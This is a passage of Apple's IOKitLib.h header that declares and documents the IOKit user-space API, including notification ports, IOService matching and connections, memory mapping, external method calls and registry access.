@param messageType A messageType enum, defined by IOKit/IOMessage.h or by the IOService's family.\n    @param messageArgument An argument for the message, dependent on the messageType.\n*/\n\ntypedef void\n(*IOServiceInterestCallback)(\n\tvoid *\t\t\trefcon,\n\tio_service_t\t\tservice,\n\tuint32_t\t\tmessageType,\n\tvoid *\t\t\tmessageArgument );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*! 
@const kIOMasterPortDefault\n    @abstract The default mach port used to initiate communication with IOKit.\n    @discussion When specifying a master port to IOKit functions, the NULL argument indicates \"use the default\". This is a synonym for NULL, if you'd rather use a named constant.\n*/\n\nextern\nconst mach_port_t kIOMasterPortDefault;\n\n/*! @function IOMasterPort\n    @abstract Returns the mach port used to initiate communication with IOKit.\n    @discussion Functions that don't specify an existing object require the IOKit master port to be passed. This function obtains that port.\n    @param bootstrapPort Pass MACH_PORT_NULL for the default.\n    @param masterPort The master port is returned.\n    @result A kern_return_t error code. */\n\nkern_return_t\nIOMasterPort( mach_port_t\tbootstrapPort,\n\t      mach_port_t *\tmasterPort );\n\n\n/*! @function IONotificationPortCreate\n    @abstract Creates and returns a notification object for receiving IOKit notifications of new devices or state changes.\n    @discussion Creates the notification object to receive notifications from IOKit of new device arrivals or state changes. The notification object can be supply a CFRunLoopSource, or mach_port_t to be used to listen for events.\n    @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port.\n    @result A reference to the notification object. */\n\nIONotificationPortRef\nIONotificationPortCreate(\n\tmach_port_t\t\tmasterPort );\n\n/*! @function IONotificationPortDestroy\n    @abstract Destroys a notification object created with IONotificationPortCreate.\n    @param notify A reference to the notification object. */\n\nvoid\nIONotificationPortDestroy(\n\tIONotificationPortRef\tnotify );\n\n/*! 
@function IONotificationPortGetRunLoopSource\n    @abstract Returns a CFRunLoopSource to be used to listen for notifications.\n    @discussion A notification object may deliver notifications to a CFRunLoop client by adding the run loop source returned by this function to the run loop.\n    @param notify The notification object.\n    @result A CFRunLoopSourceRef for the notification object. */\n\nCFRunLoopSourceRef\nIONotificationPortGetRunLoopSource(\n\tIONotificationPortRef\tnotify );\n\n/*! @function IONotificationPortGetMachPort\n    @abstract Returns a mach_port to be used to listen for notifications.\n    @discussion A notification object may deliver notifications to a mach messaging client if they listen for messages on the port obtained from this function. Callbacks associated with the notifications may be delivered by calling IODispatchCalloutFromMessage with messages received \n    @param notify The notification object.\n    @result A mach_port for the notification object. */\n\nmach_port_t\nIONotificationPortGetMachPort(\n\tIONotificationPortRef\tnotify );\n\n/*! @function IODispatchCalloutFromMessage\n    @abstract Dispatches callback notifications from a mach message.\n    @discussion A notification object may deliver notifications to a mach messaging client, which should call this function to generate the callbacks associated with the notifications arriving on the port.\n    @param unused Not used, set to zero.\n    @param msg A pointer to the message received.\n    @param reference Pass the IONotificationPortRef for the object. */\n\nvoid\nIODispatchCalloutFromMessage(\n        void \t\t\t*unused,\n        mach_msg_header_t\t*msg,\n        void\t\t\t*reference );\n\n/*! @function IOCreateReceivePort\n    @abstract Creates and returns a mach port suitable for receiving IOKit messages of the specified type.\n    @discussion In the future IOKit may use specialized messages and ports\n    instead of the standard ports created by mach_port_allocate(). 
Use this\n    function instead of mach_port_allocate() to ensure compatibility with future\n    revisions of IOKit.\n    @param msgType Type of message to be sent to this port\n    (kOSNotificationMessageID or kOSAsyncCompleteMessageID)\n    @param recvPort The created port is returned.\n    @result A kern_return_t error code. */\n\nkern_return_t\nIOCreateReceivePort( uint32_t msgType, mach_port_t * recvPort );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*\n * IOObject\n */\n\n/*! @function IOObjectRelease\n    @abstract Releases an object handle previously returned by IOKitLib.\n    @discussion All objects returned by IOKitLib should be released with this function when access to them is no longer needed. Using the object after it has been released may or may not return an error, depending on how many references the task has to the same object in the kernel.\n    @param object The IOKit object to release.\n    @result A kern_return_t error code. */\n\nkern_return_t\nIOObjectRelease(\n\tio_object_t\tobject );\n\n/*! @function IOObjectRetain\n    @abstract Retains an object handle previously returned by IOKitLib.\n    @discussion Gives the caller an additional reference to an existing object handle previously returned by IOKitLib.\n    @param object The IOKit object to retain.\n    @result A kern_return_t error code. */\n\nkern_return_t\nIOObjectRetain(\n\tio_object_t\tobject );\n\n/*! @function IOObjectGetClass\n    @abstract Return the class name of an IOKit object.\n    @discussion This function uses the OSMetaClass system in the kernel to derive the name of the class the object is an instance of.\n    @param object The IOKit object.\n    @param className Caller allocated buffer to receive the name string.\n    @result A kern_return_t error code. */\n\nkern_return_t\nIOObjectGetClass(\n\tio_object_t\tobject,\n\tio_name_t\tclassName );\n\t\n/*! 
@function CFStringRef IOObjectCopyClass\n    @abstract Return the class name of an IOKit object.\n\t@discussion This function does the same thing as IOObjectGetClass, but returns the result as a CFStringRef.\n\t@param object The IOKit object.\n\t@result The resulting CFStringRef. This should be released by the caller. If a valid object is not passed in, then NULL is returned.*/\n\t\nCFStringRef \nIOObjectCopyClass(io_object_t object)\nAVAILABLE_MAC_OS_X_VERSION_10_4_AND_LATER;\n\n/*! @function CFStringRef IOObjectCopySuperclassForClass\n    @abstract Return the superclass name of the given class.\n    @discussion This function uses the OSMetaClass system in the kernel to derive the name of the superclass of the class.\n\t@param classname The name of the class as a CFString.\n\t@result The resulting CFStringRef. This should be released by the caller. If there is no superclass, or a valid class name is not passed in, then NULL is returned.*/\n\nCFStringRef \nIOObjectCopySuperclassForClass(CFStringRef classname)\nAVAILABLE_MAC_OS_X_VERSION_10_4_AND_LATER;\n\n/*! @function CFStringRef IOObjectCopyBundleIdentifierForClass\n    @abstract Return the bundle identifier of the given class.\n\t@discussion This function uses the OSMetaClass system in the kernel to derive the name of the kmod, which is the same as the bundle identifier.\n\t@param classname The name of the class as a CFString.\n\t@result The resulting CFStringRef. This should be released by the caller. If a valid class name is not passed in, then NULL is returned.*/\n\nCFStringRef \nIOObjectCopyBundleIdentifierForClass(CFStringRef classname)\nAVAILABLE_MAC_OS_X_VERSION_10_4_AND_LATER;\n\n/*! @function IOObjectConformsTo\n    @abstract Performs an OSDynamicCast operation on an IOKit object.\n    @discussion This function uses the OSMetaClass system in the kernel to determine if the object will dynamic cast to a class, specified as a C-string. 
In other words, if the object is of that class or a subclass.\n    @param object An IOKit object.\n    @param className The name of the class, as a C-string.\n    @result If the object handle is valid, and represents an object in the kernel that dynamic casts to the class true is returned, otherwise false. */\n\nboolean_t\nIOObjectConformsTo(\n\tio_object_t\tobject,\n\tconst io_name_t\tclassName );\n\n/*! @function IOObjectIsEqualTo\n    @abstract Checks two object handles to see if they represent the same kernel object.\n    @discussion If two object handles are returned by IOKitLib functions, this function will compare them to see if they represent the same kernel object.\n    @param object An IOKit object.\n    @param anObject Another IOKit object.\n    @result If both object handles are valid, and represent the same object in the kernel true is returned, otherwise false. */\n\nboolean_t\nIOObjectIsEqualTo(\n\tio_object_t\tobject,\n\tio_object_t\tanObject );\n\n/*! @function IOObjectGetRetainCount\n    @abstract Returns kernel retain count of an IOKit object.\n    @discussion This function may be used in diagnostics to determine the current retain count of the kernel object.\n    @param object An IOKit object.\n    @result If the object handle is valid, the kernel objects retain count is returned, otherwise zero is returned. */\n\nuint32_t\nIOObjectGetRetainCount(\n\tio_object_t\tobject );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*\n * IOIterator, subclass of IOObject\n */\n\n/*! @function IOIteratorNext\n    @abstract Returns the next object in an iteration.\n    @discussion This function returns the next object in an iteration, or zero if no more remain or the iterator is invalid.\n    @param iterator An IOKit iterator handle.\n    @result If the iterator handle is valid, the next element in the iteration is returned, otherwise zero is returned. The element should be released by the caller when it is finished. 
*/\n\nio_object_t\nIOIteratorNext(\n\tio_iterator_t\titerator );\n\n/*! @function IOIteratorReset\n    @abstract Resets an iteration back to the beginning.\n    @discussion If an iterator is invalid, or if the caller wants to start over, IOIteratorReset will set the iteration back to the beginning.\n    @param iterator An IOKit iterator handle. */\n\nvoid\nIOIteratorReset(\n\tio_iterator_t\titerator );\n\n/*! @function IOIteratorIsValid\n    @abstract Checks an iterator is still valid.\n    @discussion Some iterators will be made invalid if changes are made to the structure they are iterating over. This function checks the iterator is still valid and should be called when IOIteratorNext returns zero. An invalid iterator can be reset and the iteration restarted.\n    @param iterator An IOKit iterator handle.\n    @result True if the iterator handle is valid, otherwise false is returned. */\n\nboolean_t\nIOIteratorIsValid(\n\tio_iterator_t\titerator );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*\n * IOService, subclass of IORegistryEntry\n */\n\n/*!\n    @function IOServiceGetMatchingService\n    @abstract Look up a registered IOService object that matches a matching dictionary.\n    @discussion This is the preferred method of finding IOService objects currently registered by IOKit (that is, objects that have had their registerService() methods invoked). To find IOService objects that aren't yet registered, use an iterator as created by IORegistryEntryCreateIterator(). IOServiceAddMatchingNotification can also supply this information and install a notification of new IOServices. The matching information used in the matching dictionary may vary depending on the class of service being looked up.\n    @param masterPort The master port obtained from IOMasterPort(). 
Pass kIOMasterPortDefault to look up the default master port.\n    @param matching A CF dictionary containing matching information, of which one reference is always consumed by this function (Note prior to the Tiger release there was a small chance that the dictionary might not be released if there was an error attempting to serialize the dictionary). IOKitLib can construct matching dictionaries for common criteria with helper functions such as IOServiceMatching, IOServiceNameMatching, IOBSDNameMatching, IOOpenFirmwarePathMatching.\n    @result The first service matched is returned on success. The service must be released by the caller.\n  */\n\nio_service_t\nIOServiceGetMatchingService(\n\tmach_port_t\tmasterPort,\n\tCFDictionaryRef\tmatching );\n\n/*! @function IOServiceGetMatchingServices\n    @abstract Look up registered IOService objects that match a matching dictionary.\n    @discussion This is the preferred method of finding IOService objects currently registered by IOKit (that is, objects that have had their registerService() methods invoked). To find IOService objects that aren't yet registered, use an iterator as created by IORegistryEntryCreateIterator(). IOServiceAddMatchingNotification can also supply this information and install a notification of new IOServices. The matching information used in the matching dictionary may vary depending on the class of service being looked up.\n    @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port.\n    @param matching A CF dictionary containing matching information, of which one reference is always consumed by this function (Note prior to the Tiger release there was a small chance that the dictionary might not be released if there was an error attempting to serialize the dictionary). 
IOKitLib can construct matching dictionaries for common criteria with helper functions such as IOServiceMatching, IOServiceNameMatching, IOBSDNameMatching, IOOpenFirmwarePathMatching.\n    @param existing An iterator handle is returned on success, and should be released by the caller when the iteration is finished.\n    @result A kern_return_t error code. */\n\nkern_return_t\nIOServiceGetMatchingServices(\n\tmach_port_t\tmasterPort,\n\tCFDictionaryRef\tmatching,\n\tio_iterator_t * existing );\n\n\nkern_return_t\nIOServiceAddNotification(\n\tmach_port_t\tmasterPort,\n\tconst io_name_t\tnotificationType,\n\tCFDictionaryRef\tmatching,\n\tmach_port_t\twakePort,\n\tuintptr_t\treference,\n\tio_iterator_t *\tnotification )  DEPRECATED_ATTRIBUTE;\n\n/*! @function IOServiceAddMatchingNotification\n    @abstract Look up registered IOService objects that match a matching dictionary, and install a notification request of new IOServices that match.\n    @discussion This is the preferred method of finding IOService objects that may arrive at any time. The type of notification specifies the state change the caller is interested in, on IOService's that match the match dictionary. Notification types are identified by name, and are defined in IOKitKeys.h. The matching information used in the matching dictionary may vary depending on the class of service being looked up.\n    @param notifyPort A IONotificationPortRef object that controls how messages will be sent when the armed notification is fired. When the notification is delivered, the io_iterator_t representing the notification should be iterated through to pick up all outstanding objects. When the iteration is finished the notification is rearmed. See IONotificationPortCreate.\n    @param notificationType A notification type from IOKitKeys.h\n<br>\tkIOPublishNotification Delivered when an IOService is registered.\n<br>\tkIOFirstPublishNotification Delivered when an IOService is registered, but only once per IOService instance. 
Some IOService's may be reregistered when their state is changed.\n<br>\tkIOMatchedNotification Delivered when an IOService has had all matching drivers in the kernel probed and started.\n<br>\tkIOFirstMatchNotification Delivered when an IOService has had all matching drivers in the kernel probed and started, but only once per IOService instance. Some IOService's may be reregistered when their state is changed.\n<br>\tkIOTerminatedNotification Delivered after an IOService has been terminated.\n    @param matching A CF dictionary containing matching information, of which one reference is always consumed by this function (Note prior to the Tiger release there was a small chance that the dictionary might not be released if there was an error attempting to serialize the dictionary). IOKitLib can construct matching dictionaries for common criteria with helper functions such as IOServiceMatching, IOServiceNameMatching, IOBSDNameMatching, IOOpenFirmwarePathMatching.\n    @param callback A callback function called when the notification fires.\n    @param refCon A reference constant for the callbacks use.\n    @param notification An iterator handle is returned on success, and should be released by the caller when the notification is to be destroyed. The notification is armed when the iterator is emptied by calls to IOIteratorNext - when no more objects are returned, the notification is armed. Note the notification is not armed when first created.\n    @result A kern_return_t error code. */\n\nkern_return_t\nIOServiceAddMatchingNotification(\n\tIONotificationPortRef\tnotifyPort,\n\tconst io_name_t\t\tnotificationType,\n\tCFDictionaryRef\t\tmatching,\n        IOServiceMatchingCallback callback,\n        void *\t\t\trefCon,\n\tio_iterator_t * \tnotification );\n\n/*! 
@function IOServiceAddInterestNotification\n    @abstract Register for notification of state changes in an IOService.\n    @discussion IOService objects deliver notifications of their state changes to their clients via the IOService::message API, and to other interested parties including callers of this function. Message type s are defined IOKit/IOMessage.h.\n    @param notifyPort A IONotificationPortRef object that controls how messages will be sent when the notification is fired. See IONotificationPortCreate.\n    @param interestType A notification type from IOKitKeys.h\n<br>\tkIOGeneralInterest General state changes delivered via the IOService::message API.\n<br>\tkIOBusyInterest Delivered when the IOService changes its busy state to or from zero. The message argument contains the new busy state causing the notification.\n    @param callback A callback function called when the notification fires, with messageType and messageArgument for the state change.\n    @param refCon A reference constant for the callbacks use.\n    @param notification An object handle is returned on success, and should be released by the caller when the notification is to be destroyed.\n    @result A kern_return_t error code. */\n\nkern_return_t\nIOServiceAddInterestNotification(\n\tIONotificationPortRef\tnotifyPort,\n        io_service_t\t\tservice,\n\tconst io_name_t \tinterestType,\n        IOServiceInterestCallback callback,\n        void *\t\t\trefCon,\n        io_object_t *\t\tnotification );\n\n/*! @function IOServiceMatchPropertyTable\n    @abstract Match an IOService objects with matching dictionary.\n    @discussion This function calls the matching method of an IOService object and returns the boolean result.\n    @param service The IOService object to match.\n    @param matching A CF dictionary containing matching information. 
IOKitLib can construct matching dictionaries for common criteria with helper functions such as IOServiceMatching, IOServiceNameMatching, IOBSDNameMatching, IOOpenFirmwarePathMatching.\n    @param matches The boolean result is returned.\n    @result A kern_return_t error code. */\n\nkern_return_t\nIOServiceMatchPropertyTable(\n        io_service_t\tservice,\n        CFDictionaryRef matching,\n        boolean_t *\tmatches );\n\n/*! @function IOServiceGetBusyState\n    @abstract Returns the busyState of an IOService.\n    @discussion Many activities in IOService are asynchronous. When registration, matching, or termination is in progress on an IOService, its busyState is increased by one. Change in busyState to or from zero also changes the IOService's provider's busyState by one, which means that an IOService is marked busy when any of the above activities is ocurring on it or any of its clients.\n    @param service The IOService whose busyState to return.\n    @param busyState The busyState count is returned.\n    @result A kern_return_t error code. */\n\nkern_return_t\nIOServiceGetBusyState(\n\tio_service_t    service,\n\tuint32_t *\tbusyState );\n\n/*! @function IOServiceWaitQuiet\n    @abstract Wait for an IOService's busyState to be zero.\n    @discussion Blocks the caller until an IOService is non busy, see IOServiceGetBusyState.\n    @param service The IOService wait on.\n    @param waitTime Specifies a maximum time to wait.\n    @result Returns an error code if mach synchronization primitives fail, kIOReturnTimeout, or kIOReturnSuccess. */\n\nkern_return_t\nIOServiceWaitQuiet(\n\tio_service_t      service,\n\tmach_timespec_t * waitTime );\n\n/*! @function IOKitGetBusyState\n    @abstract Returns the busyState of all IOServices.\n    @discussion Many activities in IOService are asynchronous. When registration, matching, or termination is in progress on an IOService, its busyState is increased by one. 
Change in busyState to or from zero also changes the IOService's provider's busyState by one, which means that an IOService is marked busy when any of the above activities is ocurring on it or any of its clients. IOKitGetBusyState returns the busy state of the root of the service plane which reflects the busy state of all IOServices.\n    @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port.\n    @param busyState The busyState count is returned.\n    @result A kern_return_t error code. */\n\nkern_return_t\nIOKitGetBusyState(\n\tmach_port_t\tmasterPort,\n\tuint32_t *\tbusyState );\n\n/*! @function IOKitWaitQuiet\n    @abstract Wait for a all IOServices' busyState to be zero.\n    @discussion Blocks the caller until all IOServices are non busy, see IOKitGetBusyState.\n    @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port.\n    @param waitTime Specifies a maximum time to wait.\n    @result Returns an error code if mach synchronization primitives fail, kIOReturnTimeout, or kIOReturnSuccess. */\n\nkern_return_t\nIOKitWaitQuiet(\n\tmach_port_t\t  masterPort,\n\tmach_timespec_t * waitTime );\n\n/*! @function IOServiceOpen\n    @abstract A request to create a connection to an IOService.\n    @discussion A non kernel client may request a connection be opened via the IOServiceOpen() library function, which will call IOService::newUserClient in the kernel. 
The rules & capabilities of user level clients are family dependent, the default IOService implementation returns kIOReturnUnsupported.\n    @param service The IOService object to open a connection to, usually obtained via the IOServiceGetMatchingServices or IOServiceAddNotification APIs.\n    @param owningTask The mach task requesting the connection.\n    @param type A constant specifying the type of connection to be created,  interpreted only by the IOService's family.\n    @param connect An io_connect_t handle is returned on success, to be used with the IOConnectXXX APIs. It should be destroyed with IOServiceClose().\n    @result A return code generated by IOService::newUserClient. */\n\nkern_return_t\nIOServiceOpen(\n\tio_service_t    service,\n\ttask_port_t\towningTask,\n\tuint32_t\ttype,\n\tio_connect_t  *\tconnect );\n\n/*! @function IOServiceRequestProbe\n    @abstract A request to rescan a bus for device changes.\n    @discussion A non kernel client may request a bus or controller rescan for added or removed devices, if the bus family does automatically notice such changes. For example, SCSI bus controllers do not notice device changes. The implementation of this routine is family dependent, and the default IOService implementation returns kIOReturnUnsupported.\n    @param service The IOService object to request a rescan, usually obtained via the IOServiceGetMatchingServices or IOServiceAddNotification APIs.\n    @param options An options mask, interpreted only by the IOService's family.\n    @result A return code generated by IOService::requestProbe. */\n\nkern_return_t\nIOServiceRequestProbe(\n\tio_service_t    service,\n\tuint32_t\toptions );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*\n * IOService connection\n */\n\n/*! 
@function IOServiceClose\n    @abstract Close a connection to an IOService and destroy the connect handle.\n    @discussion A connection created with IOServiceOpen should be closed with IOServiceClose when the connection is no longer to be used.\n    @param connect The connect handle created by IOServiceOpen. It will be destroyed by this function, and should not be released with IOObjectRelease.\n    @result A kern_return_t error code. */\n\nkern_return_t\nIOServiceClose(\n\tio_connect_t\tconnect );\n\n/*! @function IOConnectAddRef\n    @abstract Adds a reference to the connect handle.\n    @discussion Adds a reference to the connect handle.\n    @param connect The connect handle created by IOServiceOpen.\n    @result A kern_return_t error code. */\n\nkern_return_t\nIOConnectAddRef(\n\tio_connect_t\tconnect );\n\n/*! @function IOConnectRelease\n    @abstract Remove a reference to the connect handle.\n    @discussion Removes a reference to the connect handle.  If the last reference is removed an implicit IOServiceClose is performed.\n    @param connect The connect handle created by IOServiceOpen.\n    @result A kern_return_t error code. */\n\nkern_return_t\nIOConnectRelease(\n\tio_connect_t\tconnect );\n\n/*! @function IOConnectGetService\n    @abstract Returns the IOService a connect handle was opened on.\n    @discussion Finds the service object a connection was opened on.\n    @param connect The connect handle created by IOServiceOpen.\n    @param service On success, the service handle the connection was opened on, which should be released with IOObjectRelease.\n    @result A kern_return_t error code. */\n\nkern_return_t\nIOConnectGetService(\n\tio_connect_t\tconnect,\n\tio_service_t  *\tservice );\n\n/*! @function IOConnectSetNotificationPort\n    @abstract Set a port to receive family specific notifications.\n    @discussion This is a generic method to pass a mach port send right to be used by family specific notifications. 
\n    @param connect The connect handle created by IOServiceOpen.\n    @param type The type of notification requested, not interpreted by IOKit and family defined.\n    @param port The port to which to send notifications.\n    @param reference Some families may support passing a reference parameter for the caller's use with the notification.\n    @result A kern_return_t error code. */\n\nkern_return_t\nIOConnectSetNotificationPort(\n\tio_connect_t\tconnect,\n\tuint32_t\ttype,\n\tmach_port_t\tport,\n\tuintptr_t\treference );\n\n/*! @function IOConnectMapMemory\n    @abstract Map hardware or shared memory into the caller's task.\n    @discussion This is a generic method to create a mapping in the caller's task. The family will interpret the type parameter to determine what sort of mapping is being requested. Cache modes and placed mappings may be requested by the caller.\n    @param connect The connect handle created by IOServiceOpen.\n    @param memoryType What is being requested to be mapped, not interpreted by IOKit and family defined. The family may support physical hardware or shared memory mappings.\n    @param intoTask The task port for the task in which to create the mapping. This may be different to the task which opened the connection.\n    @param atAddress An in/out parameter - if the kIOMapAnywhere option is not set, the caller should pass the address where it requests the mapping be created, otherwise nothing needs to be set on input. The address of the mapping created is passed back on success.\n    @param ofSize The size of the mapping created is passed back on success.\n    @result A kern_return_t error code. 
*/\n\n#if !__LP64__\nkern_return_t\nIOConnectMapMemory(\n\tio_connect_t\tconnect,\n\tuint32_t\tmemoryType,\n\ttask_port_t\tintoTask,\n\tvm_address_t\t*atAddress,\n\tvm_size_t\t*ofSize,\n\tIOOptionBits\t options );\n\nkern_return_t IOConnectMapMemory64\n#else\nkern_return_t IOConnectMapMemory\n#endif\n\t(io_connect_t\t\tconnect,\n\t uint32_t\t\tmemoryType,\n\t task_port_t\t\tintoTask,\n\t mach_vm_address_t\t*atAddress,\n\t mach_vm_size_t\t\t*ofSize,\n\t IOOptionBits\t\t options );\n\n/*! @function IOConnectUnmapMemory\n    @abstract Remove a mapping made with IOConnectMapMemory.\n    @discussion This is a generic method to remove a mapping in the caller's task.\n    @param connect The connect handle created by IOServiceOpen.\n    @param memoryType The memory type originally requested in IOConnectMapMemory.\n    @param fromTask The task port for the task in which to remove the mapping. This may be different to the task which opened the connection.\n    @param atAddress The address of the mapping to be removed.\n    @result A kern_return_t error code. */\n\n#if !__LP64__\nkern_return_t\nIOConnectUnmapMemory(\n\tio_connect_t\tconnect,\n\tuint32_t\tmemoryType,\n\ttask_port_t\tfromTask,\n\tvm_address_t\tatAddress );\n\nkern_return_t IOConnectUnmapMemory64\n#else\nkern_return_t IOConnectUnmapMemory\n#endif\n\t(io_connect_t\t\tconnect,\n\t uint32_t\t\tmemoryType,\n\t task_port_t\t\tfromTask,\n\t mach_vm_address_t\tatAddress );\n\n/*! @function IOConnectSetCFProperties\n    @abstract Set CF container based properties on a connection.\n    @discussion This is a generic method to pass a CF container of properties to the connection. The properties are interpreted by the family and commonly represent configuration settings, but may be interpreted as anything.\n    @param connect The connect handle created by IOServiceOpen.\n    @param properties A CF container - commonly a CFDictionary but this is not enforced. 
The container should consist of objects which are understood by IOKit - these are currently : CFDictionary, CFArray, CFSet, CFString, CFData, CFNumber, CFBoolean, and are passed in the kernel as the corresponding OSDictionary etc. objects.\n    @result A kern_return_t error code returned by the family. */\n\nkern_return_t\nIOConnectSetCFProperties(\n\tio_connect_t\tconnect,\n\tCFTypeRef\tproperties );\n\n/*! @function IOConnectSetCFProperty\n    @abstract Set a CF container based property on a connection.\n    @discussion This is a generic method to pass a CF property to the connection. The property is interpreted by the family and commonly represent configuration settings, but may be interpreted as anything.\n    @param connect The connect handle created by IOServiceOpen.\n    @param propertyName The name of the property as a CFString.\n    @param property A CF container - should consist of objects which are understood by IOKit - these are currently : CFDictionary, CFArray, CFSet, CFString, CFData, CFNumber, CFBoolean, and are passed in the kernel as the corresponding OSDictionary etc. objects.\n    @result A kern_return_t error code returned by the object. 
*/\n\nkern_return_t\nIOConnectSetCFProperty(\n\tio_connect_t\tconnect,\n        CFStringRef\tpropertyName,\n\tCFTypeRef\tproperty );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n// Combined LP64 & ILP32 Extended IOUserClient::externalMethod\n\nkern_return_t\nIOConnectCallMethod(\n\tmach_port_t\t connection,\t\t// In\n\tuint32_t\t selector,\t\t// In\n\tconst uint64_t\t*input,\t\t\t// In\n\tuint32_t\t inputCnt,\t\t// In\n\tconst void      *inputStruct,\t\t// In\n\tsize_t\t\t inputStructCnt,\t// In\n\tuint64_t\t*output,\t\t// Out\n\tuint32_t\t*outputCnt,\t\t// In/Out\n\tvoid\t\t*outputStruct,\t\t// Out\n\tsize_t\t\t*outputStructCnt)\t// In/Out\nAVAILABLE_MAC_OS_X_VERSION_10_5_AND_LATER;\n\nkern_return_t\nIOConnectCallAsyncMethod(\n\tmach_port_t\t connection,\t\t// In\n\tuint32_t\t selector,\t\t// In\n\tmach_port_t\t wake_port,\t\t// In\n\tuint64_t\t*reference,\t\t// In\n\tuint32_t\t referenceCnt,\t\t// In\n\tconst uint64_t\t*input,\t\t\t// In\n\tuint32_t\t inputCnt,\t\t// In\n\tconst void\t*inputStruct,\t\t// In\n\tsize_t\t\t inputStructCnt,\t// In\n\tuint64_t\t*output,\t\t// Out\n\tuint32_t\t*outputCnt,\t\t// In/Out\n\tvoid\t\t*outputStruct,\t\t// Out\n\tsize_t\t\t*outputStructCnt)\t// In/Out\nAVAILABLE_MAC_OS_X_VERSION_10_5_AND_LATER;\n\nkern_return_t\nIOConnectCallStructMethod(\n\tmach_port_t\t connection,\t\t// In\n\tuint32_t\t selector,\t\t// In\n\tconst void\t*inputStruct,\t\t// In\n\tsize_t\t\t inputStructCnt,\t// In\n\tvoid\t\t*outputStruct,\t\t// Out\n\tsize_t\t\t*outputStructCnt)\t// In/Out\nAVAILABLE_MAC_OS_X_VERSION_10_5_AND_LATER;\n\nkern_return_t\nIOConnectCallAsyncStructMethod(\n\tmach_port_t\t connection,\t\t// In\n\tuint32_t\t selector,\t\t// In\n\tmach_port_t\t wake_port,\t\t// In\n\tuint64_t\t*reference,\t\t// In\n\tuint32_t\t referenceCnt,\t\t// In\n\tconst void\t*inputStruct,\t\t// In\n\tsize_t\t\t inputStructCnt,\t// In\n\tvoid\t\t*outputStruct,\t\t// Out\n\tsize_t\t\t*outputStructCnt)\t// 
In/Out\nAVAILABLE_MAC_OS_X_VERSION_10_5_AND_LATER;\n\nkern_return_t\nIOConnectCallScalarMethod(\n\tmach_port_t\t connection,\t\t// In\n\tuint32_t\t selector,\t\t// In\n\tconst uint64_t\t*input,\t\t\t// In\n\tuint32_t\t inputCnt,\t\t// In\n\tuint64_t\t*output,\t\t// Out\n\tuint32_t\t*outputCnt)\t\t// In/Out\nAVAILABLE_MAC_OS_X_VERSION_10_5_AND_LATER;\n\nkern_return_t\nIOConnectCallAsyncScalarMethod(\n\tmach_port_t\t connection,\t\t// In\n\tuint32_t\t selector,\t\t// In\n\tmach_port_t\t wake_port,\t\t// In\n\tuint64_t\t*reference,\t\t// In\n\tuint32_t\t referenceCnt,\t\t// In\n\tconst uint64_t\t*input,\t\t\t// In\n\tuint32_t\t inputCnt,\t\t// In\n\tuint64_t\t*output,\t\t// Out\n\tuint32_t\t*outputCnt)\t\t// In/Out\nAVAILABLE_MAC_OS_X_VERSION_10_5_AND_LATER;\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\nkern_return_t\nIOConnectTrap0(io_connect_t\tconnect,\n\t       uint32_t\t\tindex );\n\nkern_return_t\nIOConnectTrap1(io_connect_t\tconnect,\n\t       uint32_t\t\tindex,\n\t       uintptr_t\tp1 );\n\nkern_return_t\nIOConnectTrap2(io_connect_t\tconnect,\n\t       uint32_t\t\tindex,\n\t       uintptr_t\tp1,\n\t       uintptr_t\tp2);\n\nkern_return_t\nIOConnectTrap3(io_connect_t\tconnect,\n\t       uint32_t\t\tindex,\n\t       uintptr_t\tp1,\n\t       uintptr_t\tp2,\n\t       uintptr_t\tp3);\n\nkern_return_t\nIOConnectTrap4(io_connect_t\tconnect,\n\t       uint32_t\t\tindex,\n\t       uintptr_t\tp1,\n\t       uintptr_t\tp2,\n\t       uintptr_t\tp3,\n\t       uintptr_t\tp4);\n\nkern_return_t\nIOConnectTrap5(io_connect_t\tconnect,\n\t       uint32_t\t\tindex,\n\t       uintptr_t\tp1,\n\t       uintptr_t\tp2,\n\t       uintptr_t\tp3,\n\t       uintptr_t\tp4,\n\t       uintptr_t\tp5);\n\nkern_return_t\nIOConnectTrap6(io_connect_t\tconnect,\n\t       uint32_t\t\tindex,\n\t       uintptr_t\tp1,\n\t       uintptr_t\tp2,\n\t       uintptr_t\tp3,\n\t       uintptr_t\tp4,\n\t       uintptr_t\tp5,\n\t       uintptr_t\tp6);\n\n/* * * * * * * * * * 
* * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*! @function IOConnectAddClient\n    @abstract Inform a connection of a second connection.\n    @discussion This is a generic method to inform a family connection of a second connection, and is rarely used.\n    @param connect The connect handle created by IOServiceOpen.\n    @param client Another connect handle created by IOServiceOpen.\n    @result A kern_return_t error code returned by the family. */\n\nkern_return_t\nIOConnectAddClient(\n\tio_connect_t\tconnect,\n\tio_connect_t\tclient );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*\n * IORegistry accessors\n */\n\n/*! @function IORegistryGetRootEntry\n    @abstract Return a handle to the registry root.\n    @discussion This method provides an accessor to the root of the registry for the machine. The root may be passed to a registry iterator when iterating a plane, and contains properties that describe the available planes, and diagnostic information for IOKit.\n    @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port.\n    @result A handle to the IORegistryEntry root instance, to be released with IOObjectRelease by the caller, or MACH_PORT_NULL on failure. */\n\nio_registry_entry_t\nIORegistryGetRootEntry(\n\tmach_port_t\tmasterPort );\n\n/*! @function IORegistryEntryFromPath\n    @abstract Looks up a registry entry by path.\n    @discussion This function parses paths to lookup registry entries. The path should begin with '<plane name>:' If there are characters remaining unparsed after an entry has been looked up, this is considered an invalid lookup. Paths are further documented in IORegistryEntry.h\n    @param masterPort The master port obtained from IOMasterPort(). 
